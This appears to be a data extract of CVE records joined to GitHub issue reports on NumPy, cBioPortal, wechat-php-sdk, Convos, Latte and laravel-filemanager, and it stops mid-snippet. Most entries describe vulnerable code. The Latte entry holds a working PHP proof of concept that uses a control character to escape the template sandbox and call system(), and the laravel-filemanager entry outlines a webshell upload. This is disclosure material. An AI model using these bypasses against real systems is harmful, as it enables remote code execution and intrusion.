"url": "https://github.com/cBioPortal/cbioportal/pull/8751"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cbioportal_project:cbioportal:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3135898E-4C52-4F52-8C7A-6192530363FE",
"versionEndExcluding": null,
"versionEndIncluding": "3.6.21",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/cBioPortal/cbioportal/issues/8680 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cBioPortal",
"cbioportal"
] | I have tried to contact you by cbioportal@cbio.mskcc.org and asked for any other email in https://github.com/cBioPortal/cbioportal/issues/8658. Nobody replied.
The cBioPortal is vulnerable to regex injection that may lead to Denial of Service.
User controlled `heatmap` and `alteration` are used to build and run a regex expression:
https://github.com/cBioPortal/cbioportal/blob/e086d40f17ac037161677d5478a5dc5ec710bbd8/core/src/main/java/org/mskcc/cbio/portal/servlet/ProteinArraySignificanceTestJSON.java#L104-L106
The value end up in getAlteredCases https://github.com/cBioPortal/cbioportal/blob/e086d40f17ac037161677d5478a5dc5ec710bbd8/core/src/main/java/org/mskcc/cbio/portal/servlet/ProteinArraySignificanceTestJSON.java#L279-L282
Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side. | [SECURITY] Denial of service because of unsafe regex processing | https://api.github.com/repos/cBioPortal/cbioportal/issues/8680/comments | 10 | 2021-06-10T19:32:01Z | 2021-07-20T20:23:19Z | https://github.com/cBioPortal/cbioportal/issues/8680 | 917,785,038 | 8,680 | 2,868 |
CVE-2021-43678 | 2021-12-17T13:15:07.320 | Wechat-php-sdk v1.10.2 is affected by a Cross Site Scripting (XSS) vulnerability in Wechat.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gaoming13/wechat-php-sdk"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gaoming13/wechat-php-sdk/issues/30"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gaoming13/wechat-php-sdk"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gaoming13/wechat-php-sdk/issues/30"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wechat-php-sdk_project:wechat-php-sdk:1.10.2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F116A19-0C48-4A2C-9A4D-E1084AE23693",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/gaoming13/wechat-php-sdk/issues/30 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gaoming13",
"wechat-php-sdk"
] | Hello,
I would like to report for XSS vulnerability.
## Vulnerability path
File Wechat.php
- Line 58
```php
public function serve(){
// Source in this method
$this->checkParams();
// Sink in this method
$this->accessAuth();
return $this->getMessage();
}
```
- Line 468
```php
private function checkParams(){
$this->signature = isset($_GET['signature']) && !empty($_GET['signature']) ? $_GET['signature'] : false;
$this->timestamp = isset($_GET['timestamp']) && !empty($_GET['timestamp']) ? $_GET['timestamp'] : false;
$this->nonce = isset($_GET['nonce']) && !empty($_GET['nonce']) ? $_GET['nonce'] : false;
// The source with $_GET['echostr']
$this->echostr = isset($_GET['echostr']) && !empty($_GET['echostr']) ? $_GET['echostr'] : false;
$this->encrypt_type = isset($_GET['encrypt_type']) && !empty($_GET['encrypt_type']) ? $_GET['encrypt_type'] : false;
$this->msg_signature = isset($_GET['msg_signature']) && !empty($_GET['msg_signature']) ? $_GET['msg_signature'] : false;
}
```
- Line 500
```php
private function accessAuth(){
if ($this->echostr !== false) {
if (! $this->checkSignature()) {
@error_log('[wechat-php-sdk]accessAuth Error.', 0);
}
// the sink
exit($this->echostr);
}
}
``` | Possible XSS vulnerability | https://api.github.com/repos/gaoming13/wechat-php-sdk/issues/30/comments | 1 | 2021-11-11T13:57:38Z | 2021-12-08T17:59:09Z | https://github.com/gaoming13/wechat-php-sdk/issues/30 | 1,051,007,091 | 30 | 2,869 |
CVE-2021-42584 | 2021-12-17T14:15:07.607 | A Stored Cross Site Scripting (XSS) issue exists in Convos-Chat before 6.32. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://dev696.github.io/Writeup/"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/convos-chat/convos/commit/14a3b1e98cd1a3211c0ef3d4f5ffdbc60baaca54"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/convos-chat/convos/issues/623"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://dev696.github.io/Writeup/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/convos-chat/convos/commit/14a3b1e98cd1a3211c0ef3d4f5ffdbc60baaca54"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/convos-chat/convos/issues/623"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:convos:convos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "43E94376-F903-4369-89A0-BE0B4818E555",
"versionEndExcluding": "6.32",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/convos-chat/convos/issues/623 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"convos-chat",
"convos"
] | I have identified a stored cross site scripting vulnerability in https://convos.chat/, below is the POC for your reference:
POC: **(Redacted by jberger)**
Reference Link:
https://owasp.org/www-community/attacks/xss/
| Vulnerability in https://convos.chat/ | https://api.github.com/repos/convos-chat/convos/issues/623/comments | 3 | 2021-10-12T19:56:57Z | 2021-10-13T23:48:22Z | https://github.com/convos-chat/convos/issues/623 | 1,024,269,184 | 623 | 2,870 |
CVE-2021-33430 | 2021-12-17T19:15:07.500 | A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service. NOTE: The vendor does not agree this is a vulneraility; In (very limited) circumstances a user may be able provoke the buffer overflow, the user is most likely already privileged to at least provoke denial of service by exhausting memory. Triggering this further requires the use of uncommon API (complicated structured dtypes), which is very unlikely to be available to an unprivileged user | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/18939"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/18939"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "850F12C4-29D8-4406-B851-8EA669B3F80E",
"versionEndExcluding": null,
"versionEndIncluding": "1.9.3",
"versionStartExcluding": null,
"versionStartIncluding": "1.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/numpy/numpy/issues/18939 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"numpy",
"numpy"
] | <!-- Please describe the issue in detail here, and fill in the fields below -->
### Reproducing code example:
**Snippet**:
```
PyArray_NewFromDescr_int(...., **int nd**,......)
{
...............
if (descr->subarray) {
PyObject *ret;
npy_intp **newdims**[2*NPY_MAXDIMS];
npy_intp *newstrides = NULL;
**memcpy**(newdims, dims, nd*sizeof(npy_intp));
if (strides) {
newstrides = newdims + NPY_MAXDIMS;
**memcpy**(newstrides, strides, nd*sizeof(npy_intp));
}
........
}
```
### Error message:
When we run our analysis tool on NumPy, a potential buffer-overflow problem was reported. See details below:
**File**: numpy/core/src/multiarray/ctors.c
**Function**: PyArray_NewFromDescr_int
**Details** in [description](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-9532/9532.png)
Possible call path:
**1**. array_new -> PyArray_NewFromDescr_int
**2**. PyArray_Zeros -> PyArray_NewFromDescr_int
**3**. array_fromfile -> PyArray_FromFile -> PyArray_NewFromDescr_int
### NumPy/Python version information:
The main branch of NumPy
| Potential buffer overflow in PyArray_NewFromDescr_int of ctors.c | https://api.github.com/repos/numpy/numpy/issues/18939/comments | 4 | 2021-05-07T18:30:11Z | 2021-05-11T19:39:32Z | https://github.com/numpy/numpy/issues/18939 | 879,503,496 | 18,939 | 2,871 |
CVE-2021-34141 | 2021-12-17T19:15:07.543 | An incomplete string comparison in the numpy.core component in NumPy before 1.22.0 allows attackers to trigger slightly incorrect copying by constructing specific string objects. NOTE: the vendor states that this reported code behavior is "completely harmless." | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/18993"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/18993"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2EB75A95-68BF-48A9-9E5D-9571C7D25352",
"versionEndExcluding": "1.22.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:22.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "4B0C905A-EA99-4B4E-A350-7F6A63CD6EB1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"697"
] | 697 | https://github.com/numpy/numpy/issues/18993 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"numpy",
"numpy"
] | <!-- Please describe the issue in detail here, and fill in the fields below -->
### Reproducing code example:
**Snippet**:
/* Check for a deprecated Numeric-style typecode */
/* `Uint` has deliberately weird uppercasing */
char *dep_tps[] = {"Bytes", "Datetime64", "Str", "Uint"};
int ndep_tps = sizeof(dep_tps) / sizeof(dep_tps[0]);
for (int i = 0; i < ndep_tps; ++i) {
char *dep_tp = dep_tps[i];
if (strncmp(type, dep_tp, strlen(dep_tp)) == 0) { ------> '\0' not considered here, should be strlen(dep_tp)+1. (value of "type" may come from external modules)
/* Deprecated 2020-06-09, NumPy 1.20 */
if (DEPRECATE("Numeric-style type codes are "
"deprecated and will result in "
"an error in the future.") < 0) {
goto fail;
}
}
}
### Error message:
When we run our analysis tool on NumPy, an incomplete comparison problem was reported, see details below:
**File**: numpy/core/src/multiarray/descriptor.c
**Function**: _convert_from_str (line 1727 : 1740)
**Optional call-path**: PyArray_DescrAlignConverter -> _convert_from_any -> _convert_from_str
Details in [description](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-9778/9778.png)
### NumPy/Python version information:
the main branch of NumPy
| Insecure string comparison (incomplete comparison) in _convert_from_str of descriptor.c | https://api.github.com/repos/numpy/numpy/issues/18993/comments | 32 | 2021-05-12T02:04:35Z | 2022-08-23T11:45:31Z | https://github.com/numpy/numpy/issues/18993 | 889,523,180 | 18,993 | 2,872 |
CVE-2021-23803 | 2021-12-17T20:15:08.287 | This affects the package latte/latte before 2.10.6. There is a way to bypass allowFunctions that will affect the security of the application. When the template is set to allow/disallow the use of certain functions, adding control characters (x00-x08) after the function will bypass these restrictions. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nette/latte/commit/227c86eda9a8a6d060ea8501923e768b6d992210"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nette/latte/issues/279"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-PHP-LATTELATTE-1932226"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nette/latte/commit/227c86eda9a8a6d060ea8501923e768b6d992210"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nette/latte/issues/279"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-PHP-LATTELATTE-1932226"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nette:latte:*:*:*:*:*:*:*:*",
"matchCriteriaId": "00AE17FB-69B0-4BCB-AD34-D90B054D01A3",
"versionEndExcluding": "2.10.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/nette/latte/issues/279 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nette",
"latte"
] | Version: 2.10.5
### Bug Description
There is a way to bypass allowFunctions that will affect security.
### Steps To Reproduce
```php
<?php
error_reporting(0);
require 'vendor/autoload.php';
$latte = new Latte\Engine;
$policy = new Latte\Sandbox\SecurityPolicy;
$policy->allowFilters($policy::ALL);
$policy->allowMacros(['if','=']);
$policy->allowFunctions(['strlen']);
$latte->setPolicy($policy);
$latte->setSandboxMode();
$latte->setAutoRefresh(false);
file_put_contents('index.latte',"{=system\x00('whoami')}");
$latte->render('index.latte');
```
This will execute the system function.
### Expected Behavior
Should throw an error not allowed by `system` function
### Possible Solution
Use rigorous regular expression segmentation, or add more rigorous judgments in `isFunctionAllowed` function
| There is a way to bypass allowFunctions | https://api.github.com/repos/nette/latte/issues/279/comments | 14 | 2021-11-21T07:06:14Z | 2022-01-08T14:12:17Z | https://github.com/nette/latte/issues/279 | 1,059,308,710 | 279 | 2,873 |
CVE-2021-23814 | 2021-12-17T20:15:08.340 | This affects the package unisharp/laravel-filemanager from 0.0.0. The upload() function does not sufficiently validate the file type when uploading. An attacker may be able to reproduce the following steps: - Install a package with a web Laravel application. - Navigate to the Upload window - Upload an image file, then capture the request - Edit the request contents with a malicious file (webshell) - Enter the path of file uploaded on URL - Remote Code Execution **Note: Prevention for bad extensions can be done by using a whitelist in the config file(lfm.php). Corresponding document can be found in the [here](https://unisharp.github.io/laravel-filemanager/configfolder-categories). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.5,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/blob/master/src/Controllers/UploadController.php%23L26"
},
{
"source": "report@snyk.io",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1113#issuecomment-1812092975"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-1567199"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/blob/master/src/Controllers/UploadController.php%23L26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1113#issuecomment-1812092975"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-1567199"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:unisharp:laravel-filemanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4467027F-A375-40AE-AAC5-2A6CD3BC9598",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "0.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/UniSharp/laravel-filemanager/issues/1113#issuecomment-1812092975 | null | github.com | [
"UniSharp",
"laravel-filemanager"
] | https://github.com/advisories/GHSA-f8x6-m9f5-ffp8
Surprisingly can't find anything about this in the issues here yet, is this something that's gonna be addressed soon?
Thanks a lot! | CVE-2021-23814 Unrestricted Upload of File with Dangerous Type | https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1113/comments | 4 | 2022-02-01T04:52:36Z | 2023-11-22T07:43:06Z | https://github.com/UniSharp/laravel-filemanager/issues/1113 | 1,120,232,695 | 1,113 | 2,874 |
CVE-2021-41495 | 2021-12-17T20:15:08.477 | Null Pointer Dereference vulnerability exists in numpy.sort in NumPy < and 1.19 in the PyArray_DescrNew function due to missing return-value validation, which allows attackers to conduct DoS attacks by repetitively creating sort arrays. NOTE: While correct that validation is missing, an error can only occur due to an exhaustion of memory. If the user can exhaust memory, they are already privileged. Further, it should be practically impossible to construct an attack which can target the memory exhaustion to occur at exactly this place | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/19038"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/numpy/numpy/issues/19038"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "45CF1897-BE04-465C-96D5-CB5D76DF2F88",
"versionEndExcluding": null,
"versionEndIncluding": "1.19.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/numpy/numpy/issues/19038 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"numpy",
"numpy"
] | <!-- Please describe the issue in detail here, and fill in the fields below -->
### Reproducing code example:
#### The definition of PyArray_DescrNew
```
NPY_NO_EXPORT PyArray_Descr * PyArray_DescrNew(PyArray_Descr *base)
{
PyArray_Descr *newdescr = PyObject_New(PyArray_Descr, Py_TYPE(base));
if (newdescr == NULL) {
return NULL; ----------------> **point 1**
}
.........
if (base->c_metadata != NULL) {
